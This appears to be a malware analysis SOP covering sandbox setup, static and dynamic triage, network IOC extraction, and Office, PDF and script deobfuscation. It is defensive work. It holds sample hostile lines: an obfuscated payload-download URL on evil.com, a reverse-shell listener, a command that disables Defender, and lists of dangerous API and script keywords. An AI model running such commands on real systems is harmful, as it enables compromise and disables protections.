sop-malware-analysis.md

type	sop
title	Malware Analysis SOP
description	Complete malware analysis guide: static/dynamic analysis, sandbox setup, IOC extraction, YARA rules & threat intelligence for malware investigation.
tags	sop malware reverse DFIR
template_version	2026-04-27
updated	2026-04-27

Malware Analysis SOP

Table of Contents

0. Scope & Principles
1. Safety & OPSEC — 🔒 Pre-Flight Checklist
2. Intake & Chain of Custody
3. Rapid Triage (Static Analysis)
4. Behavior Analysis (Dynamic, In-Lab Only)
5. Artefact Extraction & Normalization
6. Specialized File Analysis
7. Classification & TTP Mapping
8. IOCs & Detection Engineering
9. Reporting & Documentation
10. Advanced Techniques
11. QA & Peer Review
12. Extended Reference Resources

---

0. Scope & Principles

• Objective: Analyze suspicious binaries/objects to extract IOCs, assess behavior, and assist containment/detection.
• Execution Environment: Use only isolated, disposable VM snapshots (no host execution). No clipboard or drag‑and‑drop. Prefer offline analysis or simulated internet (INetSim/DNS sinkhole).
• Legal Notice: If evidence of child safety concerns or imminent harm arises, stop immediately. Collect metadata and follow Sensitive Crime Escalation procedures.
• Confidentiality: Treat all outputs/samples as sensitive. Share on a need-to-know basis only. Label clearly (e.g., MALWARE / DO-NOT-TOUCH).

---

1. Safety & OPSEC — 🔒 Pre-Flight Checklist

• Use VM snapshot (clean, no shared folders/network, no host time sync).
• Use analysis persona (no personal/org credentials).
• Hostname, username, timezone must be non-attributable.
• No real internet. Simulated network only (e.g., INetSim).
• Tooling integrity: Verify hashes before installation; use only approved tools.
• Encrypt artefacts and label with warnings when transporting.
• Avoid uploading binaries to public services. Prefer hash-only queries.

Lab Environment Setup

VMware/VirtualBox Configuration:

# Recommended VM specifications
- OS: Windows 10/11 or REMnux/FlareVM
- RAM: 4GB minimum (8GB preferred)
- Disk: 60GB thin provisioned
- Network: Host-only or NAT with INetSim
- Snapshots: Take "Clean State" before each analysis

# Disable shared features
- Shared folders: OFF
- Clipboard sharing: OFF
- Drag and drop: OFF
- Time synchronization: OFF
- Guest additions: Minimal/None

INetSim Setup (Simulated Internet):

# Install INetSim (Linux-based)
sudo apt install inetsim

# Configure /etc/inetsim/inetsim.conf
service_bind_address    0.0.0.0
dns_default_ip          192.168.56.1
https_bind_port         443
http_bind_port          80

# Start INetSim
sudo inetsim

# Configure VM to use INetSim as DNS
# Set DNS server to INetSim host IP (e.g., 192.168.56.1)

FlareVM Installation (Windows Analysis):

# Run as Administrator
Set-ExecutionPolicy Unrestricted -Force
Invoke-WebRequest https://raw.githubusercontent.com/mandiant/flare-vm/main/install.ps1 -OutFile install.ps1
.\install.ps1

# Post-install: Disable Windows Defender (analysis VM only)
Set-MpPreference -DisableRealtimeMonitoring $true

REMnux Installation (Linux Malware Analysis):

# Download REMnux OVA or install on existing Ubuntu
wget https://REMnux.org/remnux-cli
sudo bash remnux-cli install

# Update tools
remnux update

---

2. Intake & Chain of Custody

Sample Acquisition & Metadata Collection

1. Assign identifiers:

   case_id: CASE-2025-1005-001
   sample_id: SAM-20251005-1430-001
   

2. Log acquisition metadata:

   • Source (email attachment, endpoint, URL, upload)
   • Timestamp (UTC)
   • Submitter name and contact
   • Original filename and path
   • Context (incident ticket, alert ID, user report)

3. Calculate file hashes:

   # Linux/macOS
   sha256sum sample.exe
   sha1sum sample.exe
   md5sum sample.exe
   
   # Windows (PowerShell)
   Get-FileHash sample.exe -Algorithm SHA256
   Get-FileHash sample.exe -Algorithm SHA1
   Get-FileHash sample.exe -Algorithm MD5
   
   # All at once (PowerShell)
   @('SHA256', 'SHA1', 'MD5') | ForEach-Object { Get-FileHash sample.exe -Algorithm $_ }

4. Store original in evidence vault:

   # Create case structure
   mkdir -p /evidence/CASE-2025-1005-001/{intake,binaries,static,dynamic,artifacts,iocs,detections,report}
   
   # Copy with hash verification
   cp sample.exe /evidence/CASE-2025-1005-001/intake/SAM-20251005-1430-001.bin
   sha256sum /evidence/CASE-2025-1005-001/intake/SAM-20251005-1430-001.bin
   
   # Create password-protected archive (password: infected)
   7z a -pinfected -mhe=on /evidence/CASE-2025-1005-001/intake/SAM-20251005-1430-001.7z sample.exe

5. Extract email headers (if applicable):

   # Save .eml file and extract headers
   grep -E "^(From|To|Subject|Date|Received|Return-Path|X-|Message-ID):" sample.eml > headers.txt
   
   # Extract attachments with munpack (mpack package)
   munpack -t sample.eml

6. VirusTotal hash lookup (no upload):

   # Using VT CLI (requires API key)
   vt file <SHA256_HASH>
   
   # Manual lookup
   # https://www.virustotal.com/gui/file/<SHA256_HASH>

Chain of Custody Form

| Field              | Value                              |
|--------------------|------------------------------------|
| Case ID            | CASE-2025-1005-001                 |
| Sample ID          | SAM-20251005-1430-001              |
| Filename           | invoice_2025.exe                   |
| SHA256             | a1b2c3d4e5f6...                    |
| Acquisition Date   | 2025-10-05 14:30:00 UTC            |
| Source             | Email attachment (phishing report) |
| Submitter          | John Doe (john.doe@example.com)    |
| Custodian          | Analyst Name                       |
| Storage Location   | /evidence/CASE-2025-1005-001/      |
| Access Log         | See access_log.txt                 |

---

3. Rapid Triage (Static Analysis)

3.1 File Identification & Packing

Identify file type:

# Linux
file sample.bin
file -b sample.bin  # Brief output

# Check magic bytes manually
xxd sample.bin | head
hexdump -C sample.bin | head

# Windows (PowerShell with TrID)
trid sample.bin

PE file analysis (Windows executables):

# Using pestudio (Windows GUI)
pestudio.exe sample.exe

# Using pefile (Python)
python -c "import pefile; pe = pefile.PE('sample.exe'); print(pe.dump_info())"

# Check sections for packing indicators
# VirtualSize >> RawSize = likely packed
peframe sample.exe | grep -A 10 "Sections"

# Common packer section names
# UPX0, UPX1, UPX2 → UPX packer
# .aspack → ASPack
# .petite → PETite
# .ndata → .NET obfuscation

PE metadata extraction:

# Using exiftool
exiftool sample.exe | grep -E "(FileDescription|CompanyName|OriginalFilename|LegalCopyright|ProductName)"

# Check digital signature
sigcheck -a sample.exe  # Sysinternals

# Extract timestamp (can be forged)
peframe sample.exe | grep "Timestamp"

# Check for overlay data (appended after PE sections)
# If file size > sum of section sizes → overlay exists

Unpacking (if safe):

# UPX unpacking
upx -d sample.exe -o sample_unpacked.exe

# Check entropy (high entropy = encrypted/packed)
peframe sample.exe | grep "Entropy"

# Manual unpacking requires debugger (x64dbg/IDA Pro)
# Set breakpoint on: VirtualAlloc, VirtualProtect, CreateProcess

ELF file analysis (Linux binaries):

# File type
file sample.bin

# ELF header info
readelf -h sample.bin

# Section headers
readelf -S sample.bin

# Program headers
readelf -l sample.bin

# Check for UPX in ELF
readelf -S sample.bin | grep UPX

# Unpack ELF UPX
upx -d sample.bin -o sample_unpacked.bin

3.2 Strings & Imports

String extraction (obfuscated and plaintext):

# FLARE Obfuscated String Solver (FLOSS) - best for malware
floss sample.exe > floss_output.txt
floss --no-static-strings sample.exe  # Only decoded strings
floss -n 8 sample.exe  # Minimum string length of 8

# Traditional strings (fallback)
strings -a -n 8 sample.exe > strings.txt
strings -el sample.exe  # UTF-16LE (Windows Unicode)

# Search for specific patterns
grep -E "https?://" floss_output.txt  # URLs
grep -E "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" floss_output.txt  # IP addresses
grep -i "user-agent" floss_output.txt
grep -i "password\|username\|token" floss_output.txt

Specific indicators to extract:

# URLs and domains
grep -oE "(http|https)://[a-zA-Z0-9./?=_%:-]*" floss_output.txt | sort -u

# IP addresses
grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" floss_output.txt | sort -u

# Registry keys
grep -i "hkey\|hklm\|hkcu\|software\\\\microsoft" floss_output.txt

# Mutexes (process synchronization objects)
grep -i "mutex\|global\\\\" floss_output.txt

# File paths
grep -E "C:\\\\|\\\\Windows\\\\|\\\\AppData\\\\|\\\\ProgramData\\\\" floss_output.txt

# Base64 encoded data (look for long alphanumeric strings ending in =)
grep -oE "[A-Za-z0-9+/]{40,}={0,2}" floss_output.txt

# PDB paths (reveal development environment)
grep -i "\.pdb" floss_output.txt

# Common crypto libraries
grep -i "advapi32\|bcrypt\|crypt32\|wincrypt" floss_output.txt

# Email addresses
grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" floss_output.txt

Import/Export analysis (PE files):

# Using peframe
peframe sample.exe | grep -A 50 "Imported Functions"
peframe sample.exe | grep -A 20 "Exported Functions"

# Using pefile (Python)
python -c "import pefile; pe = pefile.PE('sample.exe'); print('\\n'.join([e.dll.decode() + ' -> ' + f.name.decode() for e in pe.DIRECTORY_ENTRY_IMPORT for f in e.imports if f.name]))"

# Using objdump (Linux)
objdump -p sample.exe | grep "DLL Name"

# Dangerous import functions to flag
# Network: URLDownloadToFile, InternetOpen, InternetConnect, send, recv, WSAStartup
# Process: CreateProcess, ShellExecute, WinExec, CreateRemoteThread
# Injection: VirtualAlloc, VirtualAllocEx, WriteProcessMemory, NtQueueApcThread
# Persistence: RegSetValue, CreateService, SetWindowsHookEx
# Crypto: CryptEncrypt, CryptDecrypt, CryptAcquireContext
# Anti-analysis: IsDebuggerPresent, CheckRemoteDebuggerPresent, NtQueryInformationProcess

ELF imports (Linux binaries):

# List imported libraries
ldd sample.bin

# List imported symbols
nm -D sample.bin

# Check for dangerous functions
nm -D sample.bin | grep -E "(system|exec|fork|ptrace|socket|connect)"

# Disassemble imports section
objdump -T sample.bin

3.3 Capability Detection

CAPA (Mandiant Capability Analysis):

# Run CAPA with default rules
capa sample.exe

# Output to file
capa sample.exe > capa_report.txt

# Verbose output with offsets
capa -v sample.exe

# JSON output for parsing
capa -j sample.exe > capa_report.json

# Analyze unpacked sample
capa sample_unpacked.exe

Key capabilities to flag:

Capability	Indicators	MITRE ATT&CK
Network Communication	URLDownloadToFile, InternetOpen, send, recv, WSAStartup	T1071
Process Injection	VirtualAllocEx, WriteProcessMemory, CreateRemoteThread	T1055
Code Execution	CreateProcess, ShellExecute, WinExec, system()	T1059
Persistence	RegSetValue, CreateService, SetWindowsHookEx, WMI	T1547, T1053
Credential Access	LsaEnumerateLogonSessions, CredEnumerate, SamIConnect	T1003
Defense Evasion	IsDebuggerPresent, VirtualProtect, SetThreadContext	T1140, T1622
Encryption/Encoding	CryptEncrypt, CryptDecrypt, Base64 decode	T1027
Keylogging	SetWindowsHookEx (WH_KEYBOARD), GetAsyncKeyState	T1056.001
Screen Capture	BitBlt, GetDC, CreateCompatibleBitmap	T1113
File Deletion	DeleteFile, SHFileOperation, MoveFileEx (MOVEFILE_DELAY...)	T1070.004

Manual capability review (if CAPA unavailable):

# Check for specific WinAPI calls in disassembly
objdump -d sample.exe | grep -i "urldownloadtofile\|internetopen\|createprocess"

# Or use strings to find API names
strings sample.exe | grep -i "createremotethread\|virtualalloc\|writeprocessmemory"

3.4 Multi-Engine Scanning

Hash-only lookups (preferred - no sample upload):

# VirusTotal CLI (requires API key)
vt file <SHA256_HASH>

# Manual lookup URLs
# https://www.virustotal.com/gui/file/<SHA256_HASH>
# https://www.hybrid-analysis.com/search?hash=<SHA256_HASH>
# https://tria.ge/<SHA256_HASH>

# Check MalwareBazaar database
curl -X POST https://mb-api.abuse.ch/api/v1/ -d "query=get_info&hash=<SHA256_HASH>"

# Check ThreatFox IOC database
curl -X POST https://threatfox-api.abuse.ch/api/v1/ -d '{"query":"search_hash","hash":"<SHA256_HASH>"}'

Local/offline AV scanning (if available):

# ClamAV (open-source)
clamscan -r --bell -i sample.exe

# Update signatures first
freshclam

# YARA scanning with community rules
yara -r /path/to/yara-rules/ sample.exe

Detection name analysis: If VirusTotal shows detections, analyze vendor names:

• Trojan.Generic → Generic heuristic detection
• Trojan.Agent → Unknown malware family
• Win32.Emotet.A → Specific family (Emotet) and variant (A)
• Ransom.Lockbit → Ransomware family (Lockbit)
• PUA / PUP → Potentially Unwanted Application/Program
• Packed.VMProtect → Packer/protector detection

3.5 Packed Sample Handling

When entropy is high, imports are sparse, and section names look unfamiliar, the sample is almost certainly packed or protected. Static analysis on the packed binary yields almost nothing — pivot to identification, then either unpack statically (UPX-class) or capture the unpacked image during dynamic analysis (commercial protectors).

Quick signals that a sample is packed:

• Entropy > 7.0 overall, or any individual section > 6.8.
• Import table very small, or limited to LoadLibrary / GetProcAddress / VirtualAlloc / VirtualProtect (runtime-resolution pattern).
• Section names match known packer fingerprints (table below).
• Section characteristics — executable section with no readable strings, or a single oversized section combining code and data.
• PE anomalies — entry point outside the first section, missing .text/.rsrc, unusually small code section, large overlay.

Common packers and reversibility:

Packer / Protector	Section / Signature Indicators	Static unpacking?
UPX	UPX0 / UPX1 / UPX2 sections, UPX! magic in overlay	Yes — upx -d sample.exe
ASPack	.aspack section, aSPack string, low import count	Partially — community tools
MPRESS	.MPRESS1 / .MPRESS2, LZMA-compressed body	Partially — community tools
Themida / WinLicense	.themida / .winlicen sections, virtualized code, heavy anti-debug	No — requires dynamic dump
VMProtect	.vmp0 / .vmp1 sections, custom VM bytecode, anti-tamper	No — requires dynamic dump
Enigma Protector	.enigma1 / .enigma2, license-check stubs	No — requires dynamic dump
Custom / unknown	Unknown section names, high entropy, minimal imports	No — dynamic + manual

Workflow when packing is detected:

1. Identify the packer with Detect It Easy (DIE), pestudio, or ExeinfoPE. Record the packer name and per-section entropy in the triage notes.
2. Try UPX first if signatures match:

   upx -d packed_sample.exe -o unpacked_sample.exe
   sha256sum packed_sample.exe unpacked_sample.exe

3. Record both hashes. The packed hash is the delivery artifact (use it for VT pivots and IOCs); the unpacked hash often matches a known family.
4. Re-run §3.2 / §3.3 on the unpacked binary — imports and strings are usually an order of magnitude richer.
5. For commercial protectors (Themida, VMProtect, Enigma) and custom packers, static unpacking is not viable. Dump the unpacked image during dynamic analysis instead — break on VirtualAlloc(PAGE_EXECUTE_READWRITE) followed by WriteProcessMemory / memcpy into the new region, or use pe-sieve / hollows_hunter against the running PID:

   hollows_hunter.exe /pid <malware_pid> /shellc 3 /data 3
   pe-sieve.exe /pid <malware_pid> /imp 3 /data 3
   

   Both tools dump suspicious in-memory regions (hollowed sections, RWX shellcode, unpacked PE images) to disk for static analysis.
6. Sophistication signal. Commercial protectors → Advanced. Custom packer → Advanced / APT-grade. Note this in the report — packer choice is itself an attribution data point.

Tools for packer detection:

Tool	Notes
Detect It Easy (DIE)	Primary; 300+ packer/compiler signatures, per-section entropy heatmap.
pestudio	PE analysis with packer detection + entropy visualization.
PEiD	Older but widely-referenced signature DB; treat as supporting evidence.
ExeinfoPE	Fills gaps when DIE is inconclusive.
CFF Explorer	Manual section / header inspection.

---

4. Behavior Analysis (Dynamic, In-Lab Only)

4.1 Monitoring Setup

Pre-execution checklist:

• Take clean VM snapshot
• Verify network is isolated (INetSim active)
• Start monitoring tools
• Set up screen recording (optional but recommended)

Process Monitor (Procmon) - Sysinternals:

# Launch Procmon
procmon.exe

# Configure filters to reduce noise:
# Filter -> Process Name -> is -> sample.exe -> Include
# Filter -> Process Name -> is -> rundll32.exe -> Include (if sample uses it)
# Filter -> Operation -> contains -> Reg -> Include (registry operations)
# Filter -> Operation -> contains -> File -> Include (file operations)

# Enable: Show File System Activity, Show Registry Activity, Show Network Activity
# Disable: Show Process and Thread Activity (too noisy)

# Save output after execution
# File -> Save -> All Events -> CSV format

Wireshark (Network Traffic Capture):

# Start capture on adapter connected to INetSim
wireshark -i eth0 -k

# Apply display filter for analysis
# DNS queries: dns
# HTTP traffic: http
# TLS/SSL: tls
# Specific IP: ip.addr == 192.168.56.101

# Save PCAP after execution
# File -> Save As -> sample_traffic.pcapng

System Informer (Process & Memory Analysis):

Formerly Process Hacker — renamed to System Informer in 2022 and now maintained by Winsider Seminars & Solutions. The legacy ProcessHacker.exe binary is still distributed for compatibility but new analysis builds should use the SystemInformer.exe build from the official repo (https://github.com/winsiderss/systeminformer).

# Launch System Informer as Administrator
SystemInformer.exe

# Monitor for:
# - New process creation (sample.exe and child processes)
# - Memory allocations (Heap, Private memory)
# - Handles (Files, Registry, Mutexes)
# - Network connections

# To dump process memory:
# Right-click process -> Create dump file

Sysmon (Advanced Windows Logging):

# Install Sysmon with SwiftOnSecurity config
sysmon64.exe -accepteula -i sysmonconfig-export.xml

# Download config from:
# https://github.com/SwiftOnSecurity/sysmon-config

# View Sysmon logs
Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" | Format-List

# Export Sysmon logs
wevtutil epl Microsoft-Windows-Sysmon/Operational C:\evidence\sysmon_logs.evtx

Regshot (Registry Comparison):

# Take snapshot before execution
Regshot.exe -> 1st shot

# Execute malware

# Take snapshot after execution
Regshot.exe -> 2nd shot

# Compare and save
Compare -> Output to HTML

Noriben (Automated Procmon Analysis):

# Run Noriben with automatic procmon collection
python Noriben.py --cmd sample.exe

# Generates: Noriben_<timestamp>.txt with parsed behavior

4.2 Execution & Observation

Execute the sample:

# Execute in isolated VM
.\sample.exe

# Or with arguments if required
.\sample.exe --install

# For DLL files, use rundll32
rundll32.exe sample.dll,DllMain

# For scripts
powershell.exe -ExecutionPolicy Bypass -File sample.ps1
cscript.exe //NoLogo sample.vbs

Track spawned processes:

# PowerShell - monitor process creation
Get-WmiObject Win32_Process | Select-Object ProcessId,Name,CommandLine,ParentProcessId | Format-Table

# Command line - watch for new processes
wmic process list full

# Check process tree in System Informer
# View -> Tree view -> Expand sample.exe

Inspect dropped files:

# Find recently created files (last 5 minutes)
Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue | Where-Object {$_.CreationTime -gt (Get-Date).AddMinutes(-5)}

# Common drop locations to check manually
C:\Users\<user>\AppData\Local\Temp\
C:\Users\<user>\AppData\Roaming\
C:\ProgramData\
C:\Windows\Temp\

# Hash all dropped files
Get-ChildItem -Path C:\Users\<user>\AppData\Local\Temp\ -Recurse | Get-FileHash -Algorithm SHA256

Common persistence mechanisms to check:

Location	Command	Technique
Registry Run Keys	reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run	T1547.001
	reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Startup Folder	dir "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"	T1547.001
	dir "%PROGRAMDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
Scheduled Tasks	schtasks /query /fo LIST /v	T1053.005
	Get-ScheduledTask | Where-Object {$_.TaskName -notlike "Microsoft*"}
	COM API used by malware: ITaskService → ITaskFolder::RegisterTaskDefinition (Task Scheduler 2.0; there is no Win32 CreateScheduledTask function)
	Watch for unsigned tasks calling out to UNC paths (\\server\share\payload.exe) — common LOLBAS variant
Services	sc query	T1543.003
	Get-Service | Where-Object {$_.Status -eq "Running"}
WMI Event Subscription	Get-WmiObject -Namespace root\Subscription -Class __EventFilter	T1546.003
	Get-WmiObject -Namespace root\Subscription -Class __EventConsumer
DLL Hijacking	Check for unexpected DLLs in application directories	T1574.001

Inspect mutexes and named objects:

# Using System Informer
# Select process -> Handles tab -> Filter: "Mutant"

# Using Handle.exe (Sysinternals)
handle.exe -a -p <PID>

# Common mutex names to flag
# Global\<random_string>
# Local\<random_string>

Check for injection into legitimate processes:

# Look for unusual memory allocations in explorer.exe, svchost.exe, etc.
# System Informer -> Select process -> Memory tab
# Flag RWX (Read-Write-Execute) memory regions

# Dump suspicious memory regions
# Right-click memory region -> Save -> memory_dump.bin

4.3 Network Behavior

DNS traffic analysis:

# Wireshark display filter for DNS
dns

# Extract DNS queries from PCAP (tshark)
tshark -r sample_traffic.pcapng -Y dns -T fields -e dns.qry.name | sort -u

# Look for:
# - DGA (Domain Generation Algorithm) patterns (long random domains)
# - Known C2 domains
# - Unusual TLDs (.tk, .ml, .ga, .cf)
# - Fast-flux DNS (multiple A records)

HTTP/HTTPS traffic analysis:

# Wireshark filter for HTTP
http

# Extract HTTP requests
tshark -r sample_traffic.pcapng -Y http.request -T fields -e http.host -e http.request.uri

# Extract User-Agent strings
tshark -r sample_traffic.pcapng -Y http -T fields -e http.user_agent | sort -u

# Check for:
# - Suspicious User-Agents (PowerShell, python-requests, curl)
# - C2 beacon patterns (regular intervals)
# - POST requests with encrypted/encoded data
# - Downloads (exe, dll, ps1, vbs files)

TLS/SSL analysis:

# Extract TLS Server Name Indication (SNI)
tshark -r sample_traffic.pcapng -Y tls.handshake.extensions_server_name -T fields -e tls.handshake.extensions_server_name | sort -u

# Check certificate details
tshark -r sample_traffic.pcapng -Y ssl.handshake.certificate -T fields -e x509sat.printableString

# Flag:
# - Self-signed certificates
# - Unusual certificate issuers
# - Mismatched SNI and certificate CN

Modern covert C2 channels to flag specifically:

• DNS-over-HTTPS (DoH) tunneling — outbound TLS to cloudflare-dns.com, dns.google, dns.quad9.net, or any host on :443 returning the application/dns-message content type. Procmon dns.google resolutions paired with TLS to those IPs from a non-browser process is a strong signal. Capture full PCAP and decrypt with a TLS keylog file (SSLKEYLOGFILE) when possible.
• Named-pipe C2 — beacons that talk locally over \\.\pipe\<name> to a sibling process (often a hollowed svchost.exe or stomped DLL — see §10.4). System Informer → process → Handles tab → filter Named Pipe makes these visible. Common with Cobalt Strike SMB beacons.
• Domain fronting — TLS handshake SNI is a popular CDN-hosted hostname (Azure Front Door, Fastly, CloudFront), but the inner HTTP Host: header points to the actual C2. tshark filter tls.handshake.extensions_server_name versus http2.header.value (or post-decryption http.host) reveals the mismatch. Most major fronting providers have closed the technique on production tenants but it still appears in older toolkits and self-hosted CDNs.
• HTTPS with pinned certificates — sample carries the C2 server cert hash in code; INetSim's default self-signed response causes the malware to drop the connection. Symptom is "no traffic after first TLS ClientHello." Workaround: configure mitmproxy with a captured/forged cert, or static-analyze the pinned hash and replace it.

Identify outbound connections:

# Using TCPView (GUI)
tcpview.exe

# Using netstat (command line)
netstat -ano | findstr ESTABLISHED

# Get full connection details
Get-NetTCPConnection | Where-Object {$_.State -eq "Established"} | Format-Table

# Check for common C2 ports
# 443, 8443 (HTTPS)
# 80, 8080 (HTTP)
# 53 (DNS tunneling)
# 4444, 5555 (Metasploit default)
# 1234, 31337 (backdoors)

Test C2 communication (lab environment only):

# Set up ncat listener to catch reverse shell
ncat -lnvp 4444

# For HTTPS/TLS callbacks
ncat -lnvp 443 --ssl

# Monitor all connection attempts
tcpdump -i any -n -vv

Extract network IOCs:

# List all contacted IPs
tshark -r sample_traffic.pcapng -T fields -e ip.dst | sort -u | grep -v "192.168\|10.0\|127.0.0.1"

# List all contacted domains
tshark -r sample_traffic.pcapng -Y dns -T fields -e dns.qry.name | sort -u

# Extract URLs from HTTP traffic
tshark -r sample_traffic.pcapng -Y http.request -T fields -e http.host -e http.request.uri | awk '{print "http://"$1$2}'

---

5. Artefact Extraction & Normalization

• Collect & rehash dropped files
• Export:
  • PCAP
  • procmon logs
  • Registry diffs
  • Event logs
  • Screenshots
• Normalize timestamps to UTC
• Extract PDB paths & PE metadata
• Store in structured case folder:

/CASE-<case_id>/
  intake/
  binaries/
  static/
  dynamic/
  artifacts/
  iocs/
  detections/
  report/

---

6. Specialized File Analysis

6.1 .NET/C# Analysis

.NET detection:

# Check for .NET assembly
file sample.exe | grep "PE32.*Mono/.Net assembly"

# Or use strings
strings sample.exe | grep "mscoree.dll"

# Check assembly info with ildasm (Microsoft IL Disassembler)
ildasm sample.exe

Decompilation with dnSpy:

1. Open sample.exe in dnSpy
2. Navigate Assembly Explorer -> sample.exe -> Namespace -> Class
3. Look for:
   - Main() function (entry point)
   - Embedded resources (right-click assembly -> Go to Resources)
   - Obfuscated strings (base64, XOR, etc.)
   - System.Net (HTTP, WebClient, DownloadFile)
   - System.Security.Cryptography (AES, DES, RSA)
   - System.Reflection (dynamic code loading)
   - System.Diagnostics.Process (command execution)
4. Set breakpoints and debug dynamically (Start button)

Decompilation with ILSpy:

# Command-line decompilation
ilspycmd sample.exe -o decompiled_output/

# GUI version
ilspy.exe sample.exe

# Look for:
# - Hardcoded IPs/domains in strings
# - Decryption routines
# - Anti-VM checks

Extract embedded resources:

# Using dnSpy
# Right-click Assembly -> Resources -> Save All

# Using ResourceHacker (Windows)
ResourceHacker.exe -open sample.exe -save resources.txt -action extract

# Embedded payloads often stored as:
# - Encrypted byte arrays
# - Compressed streams (GZip, Deflate)
# - Base64-encoded strings

.NET deobfuscation:

# de4dot - .NET deobfuscator
de4dot sample.exe -o sample_deobfuscated.exe

# Handles common obfuscators:
# - ConfuserEx
# - .NET Reactor
# - Eazfuscator

6.2 Office/Macro Analysis

Identify macro-enabled documents:

# File extensions with macros
# .docm, .xlsm, .pptm, .doc (legacy), .xls (legacy)

# Detect OLE files
file document.docm
# Output: "Composite Document File V2 Document"

# Quick check for VBA macros
strings document.docm | grep -i "vba\|macro\|autoopen\|document_open"

Extract macros with oledump.py (Didier Stevens):

# List all streams in OLE file
oledump.py document.docm

# Look for "M" indicator (macros present)
# Example output:
#  1:       114 '\x01CompObj'
#  2:      4096 '\x05DocumentSummaryInformation'
#  3: M    8192 'Macros/VBA/ThisDocument'  <- Macro present

# Extract macro from stream 3
oledump.py -s 3 -v document.docm

# Decompress corrupt VBA
oledump.py -s 3 --vbadecompresscorrupt document.docm

# Dump all macros to file
oledump.py -s 3 -v document.docm > macros.vba

Extract macros with olevba (oletools):

# Analyze and extract VBA macros
olevba document.docm

# Summary mode (flags suspicious keywords)
olevba --decode document.docm

# JSON output
olevba -j document.docm > macros.json

# Look for IOCs (URLs, IPs, file paths)
olevba --decode document.docm | grep -E "http|https|ftp|powershell|cmd|wscript"

Suspicious VBA keywords to flag:

• AutoOpen, Document_Open, Workbook_Open (Auto-execution)
• Shell, CreateObject("WScript.Shell") (Command execution)
• URLDownloadToFile, MSXML2.XMLHTTP (File download)
• CreateObject("Scripting.FileSystemObject") (File operations)
• ExecuteStatement, Eval (Dynamic code execution)
• CallByName (Obfuscation technique)

Inspect .docx/.xlsx structure (ZIP format):

# Extract Office Open XML document
unzip document.docx -d document_extracted/

# Check for template injection
cat document_extracted/word/_rels/document.xml.rels | grep "Target.*http"

# Look for external relationships (template injection)
# <Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
#              Target="http://malicious.com/template.dotm" TargetMode="External"/>

# Check for embedded objects
ls document_extracted/word/embeddings/

Analyze Excel 4.0 macros (XLM macros):

# XLM macros in .xls files (legacy format)
oledump.py document.xls | grep XL

# Extract XLM formulas with XLMMacroDeobfuscator
python XLMMacroDeobfuscator.py -f document.xls

# Or use olevba
olevba document.xls --deobf

Dynamic analysis (sandbox execution):

1. Use Office in isolated VM (FlareVM)
2. Enable Content when prompted (activates macro)
3. Monitor with Procmon for:
   - PowerShell execution
   - WScript/CScript execution
   - File writes to temp directories
   - Network connections

6.3 PDF Analysis

Analyze PDF structure:

# Scan for malicious content with pdfid.py
pdfid.py document.pdf

# Flags to watch for:
# /OpenAction, /AA (Auto-execute on open)
# /JavaScript, /JS (Embedded JavaScript)
# /Launch (Execute external program)
# /EmbeddedFile (Embedded files)
# /RichMedia (Flash, multimedia)

# Analyze PDF streams
pdf-parser.py document.pdf

# Extract JavaScript
pdf-parser.py --search javascript document.pdf

# Dump specific object
pdf-parser.py --object 15 document.pdf

# Extract all streams
pdf-parser.py --raw document.pdf > pdf_streams.txt

Extract embedded files from PDF:

# Using peepdf-3 (Python 3 fork — original peepdf is Python 2 / unmaintained)
pip install peepdf-3
peepdf -i document.pdf

# Commands in interactive mode:
# > tree  (show object structure)
# > object 15  (inspect object)
# > stream 15  (extract stream)
# > extract stream 15 > extracted_payload.bin

Modern PDF CVEs to flag during triage (recent, high-impact):

• CVE-2023-21608 — Adobe Acrobat Reader use-after-free → remote code execution.
• CVE-2023-26369 — Adobe Acrobat Reader out-of-bounds write; flagged as actively exploited in the wild.
• CVE-2024-4367 — PDF.js arbitrary JavaScript execution; affects Firefox and any web app embedding the vulnerable PDF.js viewer.
• CVE-2023-36664 — Ghostscript command injection via crafted PDF; primarily impacts server-side PDF processing pipelines (mail gateways, CI rendering).

If pdfid flags /JavaScript, /AA, or /OpenAction and the sample arrived in a context likely to hit one of these renderers, prioritize extracting embedded JS / streams and cross-reference vendor advisories before declaring benign.

6.4 Script Analysis (PowerShell/VBS/JS)

PowerShell deobfuscation:

# Common obfuscation patterns
# Base64 encoded commands
$encoded = "Base64StringHere"
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encoded))

# Examine script without executing
Get-Content malicious.ps1

# Look for:
# - Invoke-Expression (IEX) - executes string as code
# - DownloadString, DownloadFile - downloads payload
# - FromBase64String - decodes embedded payload
# - Compression (IO.Compression.GzipStream)
# - WMI queries (Get-WmiObject)
# - Invoke-WebRequest, Invoke-RestMethod

# Static deobfuscation with PSDecode
Import-Module PSDecode
PSDecode -InputFile malicious.ps1 -OutputFile decoded.txt

# Or use online tools (in isolated environment)
# https://github.com/R3MRUM/PSDecode

VBScript/JScript analysis:

# Analyze without execution
cat malicious.vbs

# High-priority pattern grep
grep -iE "CreateObject|GetObject|WScript\.Shell|MSXML2\.XMLHTTP|WinHttp|ADODB\.Stream|Eval|Execute|ExecuteGlobal|StrReverse|Chr\(|Replace\(" malicious.vbs

Common obfuscation primitives and how to defeat them statically:

Chr() concatenation — characters built from ASCII codes to hide strings:

cmd = Chr(99) & Chr(109) & Chr(100)   ' = "cmd"

# Resolve all Chr() calls in a sample
python3 -c "
import re
code = open('malicious.vbs').read()
for m in re.finditer(r'Chr\((\d+)\)', code):
    print(f'Chr({m.group(1)}) -> {chr(int(m.group(1)))}')
" | sort -u

StrReverse — string stored backwards to evade signature matching:

hidden = "elbatius/c/ exe.dmc"
WScript.Shell.Run StrReverse(hidden)   ' actually runs cmd.exe /c suitable

Replace() chains — junk characters inserted then stripped at runtime:

url = "hXXXtXXXtXXXpXXX:XXXXX//evil.com/payload.exe"
url = Replace(url, "XXX", "")   ' = "http://evil.com/payload.exe"

